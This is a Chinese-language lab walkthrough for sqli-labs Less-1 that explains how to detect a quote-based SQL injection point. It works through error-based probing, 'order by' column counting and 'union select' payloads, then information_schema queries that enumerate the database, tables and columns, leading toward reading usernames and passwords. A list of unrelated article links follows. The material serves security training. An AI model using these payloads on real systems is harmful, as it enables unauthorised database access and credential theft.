sqli-labs Basic Challenge Less_1 通关指南

sqli-labs Basic Challenge Less_1 通关指南

测试注入点

在进行SQL注入之前,首先要找到可能出现的注入点,以及其防护等级,也就是查找是否有漏洞。

进入网页之后显示这样的页面,提示为:

Please input the ID as parameter with numeric value

在网址后输入?id=1,显示出这个界面:

接下来我们开始详细分析这个注入点

测试注入点的数据类型

对于字符型、数字型和查找型的注入代码有所不同,所以要先判断注入点的类型。

对于这三种数据类型,书写代码时有所不同,如:

  1. 对于数字型:
php 复制代码
select * from xxx where id =$id;

这种类型最为简单,直接注入不会有其他的影响。

  1. 对于字符型:
php 复制代码
select * from xxx where id ='$id';

或者:

php 复制代码
select * from xxx where id ="$id";

在进行注入的时候如果不进行任何其他操作,整个命令都会被当成一个字符型数据类型,导致注入的代码无法执行

  1. 对于查找型:
php 复制代码
select * from xxx where id like %$id%;

查找型与字符型基本同理。

测试过程:

首先测试为数字型的可能性,我们输入:

php 复制代码
/?id=1 and 1=1

以及

php 复制代码
/?id=1 and 1=2

测试有无异常,发现没有异常。

然后我们测试为字符型的可能性:

php 复制代码
/?id=1' and 1=2

发生报错:

报错信息为:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and1=2' LIMIT 0,1' at line 1

报错信息大致意思时and1=2' LIMIT 0,1这附近的语句出现问题,确实,由于原语句中在'$id'之后有一段 LIMIT 0,1导致报错。

解决方案是:

php 复制代码
/?id=1' and 1=2 --+

--+注释后面的代码即可,最后页面显示为:

出现异常。

测试返回点:

在SQL语句执行之后,服务器的数据会在Web中显示,我们需要确定哪一个点的数据被显示在特定位置上。

测试列数:

输入代码:

php 复制代码
/?id=-1' and 1=1 order by n --+

n为常数,如果n超过列数即会报错。

报错信息为:

Unknown column '4' in 'order clause'

测试返回点:

输入代码:

php 复制代码
/?id=-1' union select 1,2,3 --+

这样我们可以把代码中的2和3替换成其他命令,这样可以在Web中显示。

收集数据:

版本

可以通过version()函数获取,示例代码如下:

bash 复制代码
select version() 

用户权限

可以通过user()函数获取:

bash 复制代码
select user() 

库名

可以通过database()函数获取

bash 复制代码
select database() 

表名与列名

这里我们就要知道一些系统表的知识了:

详细请查看MySQL系统库之information_schema,这个表中记录了库名、表名、列名等有效信息。

bash 复制代码
select * from information_schema.tables where TABLE_SCHEMA='database()'

具体解释为:查找改数据库中所有表的信息。

bash 复制代码
select * from information_schema.column where TABLE_NAME='XXX'

具体解释为查找某个表中所有列名。

查找敏感信息

在获取了以上信息后,就可以查询一些敏感信息了,包括用户的用户名和密码等。

相关推荐
鸭梨大大大几秒前
Spring Web MVC入门
前端·spring·mvc
吃没吃3 分钟前
vue2.6-源码学习-Vue 初始化流程分析 (src/core/instance/init.js)
前端
XH2764 分钟前
Android Room用法详解
前端
ifanatic23 分钟前
[每周一更]-(第138期):MySQL 子查询详解:原理、应用及优化方案
数据库·mysql
木木黄木木1 小时前
css炫酷的3D水波纹文字效果实现详解
前端·css·3d
神经毒素1 小时前
WEB安全--文件上传漏洞--36C3 CTF includer bypass
linux·安全·web安全
DPLSLAB61 小时前
数字孪生重构安全边界:无人机 “虚拟孪生体“ 的预演革命 —— 北京智慧云测构建全要素仿真体系
安全·重构·无人机
郁大锤1 小时前
Flask与 FastAPI 对比:哪个更适合你的 Web 开发?
前端·flask·fastapi
kfepiza1 小时前
Debian编译安装mysql8.0.41源码包 笔记250401
数据库·笔记·mysql·debian·database
老王笔记2 小时前
MySQL统计信息
数据库·mysql